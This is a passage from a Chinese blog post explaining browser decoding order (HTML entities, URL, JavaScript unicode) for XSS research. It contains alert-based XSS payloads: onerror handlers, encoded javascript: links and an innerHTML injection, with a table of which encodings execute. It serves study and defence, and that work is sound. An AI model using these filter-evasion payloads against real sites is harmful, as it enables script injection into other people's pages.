<figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="tag">&lt;<span class="name">img</span> <span class="attr">src</span>=<span class="string">"x"</span> <span class="attr">onerror</span>=<span class="string">"alert(1);\u0061lert(2)"</span>&gt;</span>test0<span class="tag">&lt;/<span class="name">a</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">img</span> <span class="attr">src</span>=<span class="string">"x"</span> <span class="attr">onerror</span>=<span class="string">"alert(1)\u003b\u0061lert(2)"</span>&gt;</span>test1<span class="tag">&lt;/<span class="name">a</span>&gt;</span></span><br></pre></td></tr></table></figure>
<p>test0 可以弹框两个。test1不弹框</p>
<figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="tag">&lt;<span class="name">a</span> <span class="attr">href</span>=<span class="string">"javascript:alert(1)"</span>)&gt;</span>test<span class="tag">&lt;/<span class="name">a</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">a</span> <span class="attr">href</span>=<span class="string">"javascript:alert(\u0031)"</span>)&gt;</span>test1<span class="tag">&lt;/<span class="name">a</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">a</span> <span class="attr">href</span>=<span class="string">"javascript:alert('\u0031')"</span>)&gt;</span>test2<span class="tag">&lt;/<span class="name">a</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">a</span> <span class="attr">href</span>=<span class="string">"javascript:\u0061\u006c\u0065\u0072\u0074(1)"</span>)&gt;</span>test3<span class="tag">&lt;/<span class="name">a</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">a</span> <span class="attr">href</span>=<span class="string">"javascript:\u0061\u006c\u0065\u0072\u0074\u0028\u0031\u0029"</span>)&gt;</span>test4<span class="tag">&lt;/<span class="name">a</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">a</span> <span class="attr">href</span>=<span class="string">"\u006a\u0061\u0076\u0061\u0073\u0063\u0072\u0069\u0070\u0074:alert(1)"</span>)&gt;</span>test5<span class="tag">&lt;/<span class="name">a</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">a</span> <span class="attr">href</span>=<span class="string">"javascript\u003aalert(1)"</span>)&gt;</span>test6<span class="tag">&lt;/<span class="name">a</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">a</span> <span class="attr">href</span>=<span class="string">"javascript:alert('1\u000a')"</span>)&gt;</span>test7<span class="tag">&lt;/<span class="name">a</span>&gt;</span></span><br></pre></td></tr></table></figure>
<table>
<thead>
<tr>
<th style="text-align:center">测试</th>
<th style="text-align:center">结果 </th>
</tr>
</thead>
<tbody>
<tr>
<td style="text-align:center">test</td>
<td style="text-align:center">弹框</td>
</tr>
<tr>
<td style="text-align:center">test1</td>
<td style="text-align:center">失败，解析为字符串1，需要单引号</td>
</tr>
<tr>
<td style="text-align:center">test2</td>
<td style="text-align:center">弹框，编码<code>&#39;</code>则失败</td>
</tr>
<tr>
<td style="text-align:center">test3</td>
<td style="text-align:center">弹框</td>
</tr>
<tr>
<td style="text-align:center">test4</td>
<td style="text-align:center">失败，编码括号</td>
</tr>
<tr>
<td style="text-align:center">test5</td>
<td style="text-align:center">失败，URL解码时，不以javascript伪协议解析，寻找根目录下链接</td>
</tr>
<tr>
<td style="text-align:center">test6</td>
<td style="text-align:center">失败，同上，寻找相对路径链接</td>
</tr>
<tr>
<td style="text-align:center">test7</td>
<td style="text-align:center">弹框，可以添加换行符，不受印象。\u000a 换行符</td>
</tr>
</tbody>
</table>
<h2 id="判断解析流程-url"><a href="#判断解析流程-url" class="headerlink" title="判断解析流程 url"></a>判断解析流程 url</h2><p>上面分别提了三种编码，然后把URL解码，跟js解码结合在一起举了个例子。<br>可以尝试判断以下html代码再浏览器中的解析流程</p>
<figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="tag">&lt;<span class="name">a</span> <span class="attr">onclick</span>=<span class="string">"window.open('value1')"</span> <span class="attr">href</span>=<span class="string">"javascript:window.open(value2)"</span>&gt;</span></span><br></pre></td></tr></table></figure>
<p>Value1：HTML解码 -&gt; JavaScript解码 -&gt; URL解码<br>Value2：HTML解码 -&gt; URL解码 -&gt; JavaScript解码 -&gt; URL解码</p>
<p>对value1进行细节分析：</p>
<ul>
<li>HTML解码：因为a标签可以顺利生成DOM树，对<code>window.open(&#39;value1&#39;)</code>和<code>javascript:window,open(value2)</code>进行HTML解码</li>
<li>JavaScript解码：因为onclick属性，对其中内容进行JS unicode解码<code>window.open(&#39;value1&#39;)</code></li>
<li>URL解码：window.open打开一个url，对其中内容进行url解码<code>value1</code></li>
</ul>
<p>尝试判断value1最严格编码：</p>
<ul>
<li>URL编码：<code>value1</code>。只能对value1，不能对<code>&#39;value1&#39;</code></li>
<li>JS编码：<code>window</code>,<code>open</code>,<code>%76%61%6c%75%65%31</code>。不能对<code>.</code>,<code>(</code>,<code>)</code>,<code>&#39;</code>编码</li>
<li>html实体编码：全部。</li>
</ul>
<figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">&lt;!-- 未编码 --&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">a</span> <span class="attr">onclick</span>=<span class="string">"window.open('value1')"</span>&gt;</span>go<span class="tag">&lt;/<span class="name">a</span>&gt;</span></span><br><span class="line"><span class="comment">&lt;!-- URL编码 --&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">a</span> <span class="attr">onclick</span>=<span class="string">"window.open('%76%61%6c%75%65%31')"</span>&gt;</span>go<span class="tag">&lt;/<span class="name">a</span>&gt;</span></span><br><span class="line"><span class="comment">&lt;!-- 继续js编码 --&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">a</span> <span class="attr">onclick</span>=<span class="string">"\u0077\u0069\u006e\u0064\u006f\u0077.\u006f\u0070\u0065\u006e('\u0025\u0037\u0036\u0025\u0036\u0031\u0025\u0036\u0063\u0025\u0037\u0035\u0025\u0036\u0035\u0025\u0033\u0031')"</span>&gt;</span>go<span class="tag">&lt;/<span class="name">a</span>&gt;</span></span><br><span class="line"><span class="comment">&lt;!-- 继续全部html实体编码 --&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">a</span> <span class="attr">onclick</span>=<span class="string">"&amp;#x5C;&amp;#x75;&amp;#x30;&amp;#x30;&amp;#x37;&amp;#x37;&amp;#x5C;&amp;#x75;&amp;#x30;&amp;#x30;&amp;#x36;&amp;#x39;&amp;#x5C;&amp;#x75;&amp;#x30;&amp;#x30;&amp;#x36;&amp;#x65;&amp;#x5C;&amp;#x75;&amp;#x30;&amp;#x30;&amp;#x36;&amp;#x34;&amp;#x5C;&amp;#x75;&amp;#x30;&amp;#x30;&amp;#x36;&amp;#x66;&amp;#x5C;&amp;#x75;&amp;#x30;&amp;#x30;&amp;#x37;&amp;#x37;&amp;#x2E;&amp;#x5C;&amp;#x75;&amp;#x30;&amp;#x30;&amp;#x36;&amp;#x66;&amp;#x5C;&amp;#x75;&amp;#x30;&amp;#x30;&amp;#x37;&amp;#x30;&amp;#x5C;&amp;#x75;&amp;#x30;&amp;#x30;&amp;#x36;&amp;#x35;&amp;#x5C;&amp;#x75;&amp;#x30;&amp;#x30;&amp;#x36;&amp;#x65;&amp;#x28;&amp;#x27;&amp;#x5C;&amp;#x75;&amp;#x30;&amp;#x30;&amp;#x32;&amp;#x35;&amp;#x5C;&amp;#x75;&amp;#x30;&amp;#x30;&amp;#x33;&amp;#x37;&amp;#x5C;&amp;#x75;&amp;#x30;&amp;#x30;&amp;#x33;&amp;#x36;&amp;#x5C;&amp;#x75;&amp;#x30;&amp;#x30;&amp;#x32;&amp;#x35;&amp;#x5C;&amp;#x75;&amp;#x30;&amp;#x30;&amp;#x33;&amp;#x36;&amp;#x5C;&amp;#x75;&amp;#x30;&amp;#x30;&amp;#x33;&amp;#x31;&amp;#x5C;&amp;#x75;&amp;#x30;&amp;#x30;&amp;#x32;&amp;#x35;&amp;#x5C;&amp;#x75;&amp;#x30;&amp;#x30;&amp;#x33;&amp;#x36;&amp;#x5C;&amp;#x75;&amp;#x30;&amp;#x30;&amp;#x36;&amp;#x33;&amp;#x5C;&amp;#x75;&amp;#x30;&amp;#x30;&amp;#x32;&amp;#x35;&amp;#x5C;&amp;#x75;&amp;#x30;&amp;#x30;&amp;#x33;&amp;#x37;&amp;#x5C;&amp;#x75;&amp;#x30;&amp;#x30;&amp;#x33;&amp;#x35;&amp;#x5C;&amp;#x75;&amp;#x30;&amp;#x30;&amp;#x32;&amp;#x35;&amp;#x5C;&amp;#x75;&amp;#x30;&amp;#x30;&amp;#x33;&amp;#x36;&amp;#x5C;&amp;#x75;&amp;#x30;&amp;#x30;&amp;#x33;&amp;#x35;&amp;#x5C;&amp;#x75;&amp;#x30;&amp;#x30;&amp;#x32;&amp;#x35;&amp;#x5C;&amp;#x75;&amp;#x30;&amp;#x30;&amp;#x33;&amp;#x33;&amp;#x5C;&amp;#x75;&amp;#x30;&amp;#x30;&amp;#x33;&amp;#x31;&amp;#x27;&amp;#x29;"</span>&gt;</span>go<span class="tag">&lt;/<span class="name">a</span>&gt;</span></span><br></pre></td></tr></table></figure>
<p>value2 也是差不多意思了。</p>
<h2 id="判断解析流程-DOM"><a href="#判断解析流程-DOM" class="headerlink" title="判断解析流程 DOM"></a>判断解析流程 DOM</h2><p>基于DOM的解析流程 也会有所不同。</p>
<figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="tag">&lt;<span class="name">p</span> <span class="attr">id</span>=<span class="string">"1"</span>&gt;</span>hello<span class="tag">&lt;/<span class="name">p</span>&gt;</span></span><br><span class="line"></span><br><span class="line"><span class="tag">&lt;<span class="name">script</span>&gt;</span><span class="undefined"></span></span><br><span class="line"><span class="javascript"><span class="built_in">document</span>.getElementById(<span class="string">"1"</span>).innerHTML = <span class="string">"&lt;img src=&amp;#35; on\u0065rror=&amp;#97;lert&amp;#40;1)&gt;"</span>;  </span></span><br><span class="line"><span class="undefined"></span><span class="tag">&lt;/<span class="name">script</span>&gt;</span></span><br></pre></td></tr></table></figure>
<p>解析过程：JS解析 -&gt; html解析 </p>
<ul>
<li>js解析：进入script标签时，进行一个js解析。还原了onerror</li>
<li>html解析：DOM修改完html标签后，会重新建立DOM树，对其中节点重新html实体编码解析</li>
</ul>
<hr>

<h1 id="自测"><a href="#自测" class="headerlink" title="自测"></a>自测</h1><p>如果做出了以下题目，应该可以说是掌握了。<br><a href="http://test.attacker-domain.com/browserparsing/tests.html" target="_blank" rel="noopener">题目</a><br><a href="http://test.attacker-domain.com/browserparsing/answers.txt" target="_blank" rel="noopener">答案</a></p>
<hr>

<h1 id="小结"><a href="#小结" class="headerlink" title="小结"></a>小结</h1><ul>
<li>html 在生成DOM树时不会html实体编码解码<code>&lt;script&gt;</code>标签中的内容</li>
<li>如果<code>&lt;script&gt;</code>标签修改了DOM树，会对其中的节点内容进行html实体编码解析</li>
<li>js编码 对控制符无效，对字符串有效</li>
</ul>
<h1 id="参考"><a href="#参考" class="headerlink" title="参考"></a>参考</h1><p><a href="https://www.cnblogs.com/slly/p/6640761.html" target="_blank" rel="noopener">https://www.cnblogs.com/slly/p/6640761.html</a><br><a href="https://www.cnblogs.com/yanglang/p/7090120.html" target="_blank" rel="noopener">https://www.cnblogs.com/yanglang/p/7090120.html</a><br><a href="https://segmentfault.com/a/1190000009975744" target="_blank" rel="noopener">https://segmentfault.com/a/1190000009975744</a><br><a href="https://www.jianshu.com/p/cfdf1747d30e" target="_blank" rel="noopener">https://www.jianshu.com/p/cfdf1747d30e</a><br><a href="https://blog.csdn.net/qq_35513598/article/details/79861908" target="_blank" rel="noopener">https://blog.csdn.net/qq_35513598/article/details/79861908</a><br><a href="https://security.yirendai.com/news/share/26" target="_blank" rel="noopener">https://security.yirendai.com/news/share/26</a></p>

  </div>
</article>

    <div class="blog-post-comments">
        <div id="disqus_thread">
            <noscript>加载评论需要在浏览器启用 JavaScript 脚本支持。</noscript>
        </div>
    </div>



        
          <div id="footer-post-container">
  <div id="footer-post">

    <div id="nav-footer" style="display: none">
      <ul>
         
          <li><a href="/">首页</a></li>
         
          <li><a href="/search/">搜索</a></li>
         
          <li><a href="/about/">关于</a></li>
         
          <li><a href="/archives/">归档</a></li>
         
          <li><a href="/friends/">友链</a></li>
        
      </ul>
    </div>

    <div id="toc-footer" style="display: none">
      <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#前言"><span class="toc-number">1.</span> <span class="toc-text">前言</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#编码方便回顾小节"><span class="toc-number">2.</span> <span class="toc-text">编码方便回顾小节</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#浏览器渲染过程"><span class="toc-number">3.</span> <span class="toc-text">浏览器渲染过程</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#HTML-gt-DOM树"><span class="toc-number">3.1.</span> <span class="toc-text">HTML -&gt; DOM树</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#css"><span class="toc-number">3.1.1.</span> <span class="toc-text">css</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#js"><span class="toc-number">3.1.2.</span> <span class="toc-text">js</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#CSS-gt-CSSOM树"><span class="toc-number">3.2.</span> <span class="toc-text">CSS -&gt; CSSOM树</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#CSSOM-DOM-gt-render树"><span class="toc-number">3.3.</span> <span class="toc-text">CSSOM + DOM -&gt; render树</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#布局-loyout-reflow"><span class="toc-number">3.4.</span> <span class="toc-text">布局 loyout/reflow</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#全局、增量"><span class="toc-number">3.4.1.</span> <span class="toc-text">全局、增量</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#绘制-Painting"><span class="toc-number">3.5.</span> <span class="toc-text">绘制 Painting</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#渲染过程的解码过程"><span class="toc-number">4.</span> <span class="toc-text">渲染过程的解码过程</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#HTML实体编码"><span class="toc-number">4.1.</span> <span class="toc-text">HTML实体编码</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#CSS编码"><span class="toc-number">4.2.</span> <span class="toc-text">CSS编码</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#URL解析"><span class="toc-number">4.3.</span> <span class="toc-text">URL解析</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#unicode编码-javascript解析器"><span class="toc-number">4.4.</span> <span class="toc-text">unicode编码 javascript解析器</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#判断解析流程-url"><span class="toc-number">4.5.</span> <span class="toc-text">判断解析流程 url</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#判断解析流程-DOM"><span class="toc-number">4.6.</span> <span class="toc-text">判断解析流程 DOM</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#自测"><span class="toc-number">5.</span> <span class="toc-text">自测</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#小结"><span class="toc-number">6.</span> <span class="toc-text">小结</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#参考"><span class="toc-number">7.</span> <span class="toc-text">参考</span></a></li></ol>
    </div>

    <div id="share-footer" style="display: none">
      <ul>
  <li><a class="icon" href="http://www.facebook.com/sharer.php?u=http://lalajun.com/2018/08/25/浏览器渲染原理与编码解码/"><i class="fab fa-facebook fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://twitter.com/share?url=http://lalajun.com/2018/08/25/浏览器渲染原理与编码解码/&text=浏览器渲染原理与编码解码"><i class="fab fa-twitter fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://www.linkedin.com/shareArticle?url=http://lalajun.com/2018/08/25/浏览器渲染原理与编码解码/&title=浏览器渲染原理与编码解码"><i class="fab fa-linkedin fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://pinterest.com/pin/create/bookmarklet/?url=http://lalajun.com/2018/08/25/浏览器渲染原理与编码解码/&is_video=false&description=浏览器渲染原理与编码解码"><i class="fab fa-pinterest fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=浏览器渲染原理与编码解码&body=Check out this article: http://lalajun.com/2018/08/25/浏览器渲染原理与编码解码/"><i class="fas fa-envelope fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://getpocket.com/save?url=http://lalajun.com/2018/08/25/浏览器渲染原理与编码解码/&title=浏览器渲染原理与编码解码"><i class="fab fa-get-pocket fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://reddit.com/submit?url=http://lalajun.com/2018/08/25/浏览器渲染原理与编码解码/&title=浏览器渲染原理与编码解码"><i class="fab fa-reddit fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://www.stumbleupon.com/submit?url=http://lalajun.com/2018/08/25/浏览器渲染原理与编码解码/&title=浏览器渲染原理与编码解码"><i class="fab fa-stumbleupon fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://digg.com/submit?url=http://lalajun.com/2018/08/25/浏览器渲染原理与编码解码/&title=浏览器渲染原理与编码解码"><i class="fab fa-digg fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://www.tumblr.com/share/link?url=http://lalajun.com/2018/08/25/浏览器渲染原理与编码解码/&name=浏览器渲染原理与编码解码&description=&lt;p&gt;— 被怼番之后，好好学习基础原理 —&lt;/p&gt;"><i class="fab fa-tumblr fa-lg" aria-hidden="true"></i></a></li>
</ul>

    </div>

    <div id="actions-footer">
        <a id="menu" class="icon" href="#" onclick="$('#nav-footer').toggle();return false;"><i class="fas fa-bars fa-lg" aria-hidden="true"></i> 菜单</a>
        <a id="toc" class="icon" href="#" onclick="$('#toc-footer').toggle();return false;"><i class="fas fa-list fa-lg" aria-hidden="true"></i> 目录</a>
        <a id="share" class="icon" href="#" onclick="$('#share-footer').toggle();return false;"><i class="fas fa-share-alt fa-lg" aria-hidden="true"></i> 分享</a>
        <a id="top" style="display:none" class="icon" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fas fa-chevron-up fa-lg" aria-hidden="true"></i> 返回顶部</a>
    </div>

  </div>
</div>

        
        <footer id="footer">
  <div class="footer-left">
    Copyright &copy; 2019 LaLa
  </div>
  <div class="footer-right">
    <nav>
      <ul>
         
          <li><a href="/">首页</a></li>
         
          <li><a href="/search/">搜索</a></li>
         
          <li><a href="/about/">关于</a></li>
         
          <li><a href="/archives/">归档</a></li>
         
          <li><a href="/friends/">友链</a></li>
        
      </ul>
    </nav>
  </div>
</footer>

    </div>
    <!-- styles -->
<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">
<link rel="stylesheet" href="/lib/justified-gallery/css/justifiedGallery.min.css">

    <!-- jquery -->
<script src="/lib/jquery/jquery.min.js"></script>
<script src="/lib/justified-gallery/js/jquery.justifiedGallery.min.js"></script>
<!-- clipboard -->

  <script src="/lib/clipboard/clipboard.min.js"></script>
  <script type="text/javascript">
  $(function() {
    // copy-btn HTML
    var btn = "<span class=\"btn-copy tooltipped tooltipped-sw\" aria-label=\"复制到粘贴板!\">";
    btn += '<i class="far fa-clone"></i>';
    btn += '</span>'; 
    // mount it!
    $(".highlight .code pre").before(btn);
    var clip = new ClipboardJS('.btn-copy', {
      target: function(trigger) {
        return trigger.nextElementSibling;
      }
    });
    clip.on('success', function(e) {
      e.trigger.setAttribute('aria-label', "复制成功!");
      e.clearSelection();
    })
  })
  </script>

<script src="/js/main.js"></script>
<!-- search -->

<!-- Google Analytics -->

<!-- Baidu Analytics -->

<!-- Disqus Comments -->

    <script type="text/javascript">
        var disqus_shortname = 'lalajun';

        (function(){
            var dsq = document.createElement('script');
            dsq.type = 'text/javascript';
            dsq.async = true;
            dsq.src = '//' + disqus_shortname + '.disqus.com/embed.js';
            (document.getElementsByTagName('head')[0] || document.getElementsByTagName('body')[0]).appendChild(dsq);
        }());
    </script>


<script src="/live2dw/lib/L2Dwidget.min.js?094cbace49a39548bed64abff5988b05"></script><script>L2Dwidget.init({"pluginRootPath":"live2dw/","pluginJsPath":"lib/","pluginModelPath":"assets/","tagMode":false,"debug":false,"model":{"jsonPath":"/live2dw/assets/wanko.model.json"},"display":{"position":"right","width":150,"height":300,"hOffset":-30,"vOffset":0},"mobile":{"show":false},"log":false});</script></body>
</html>
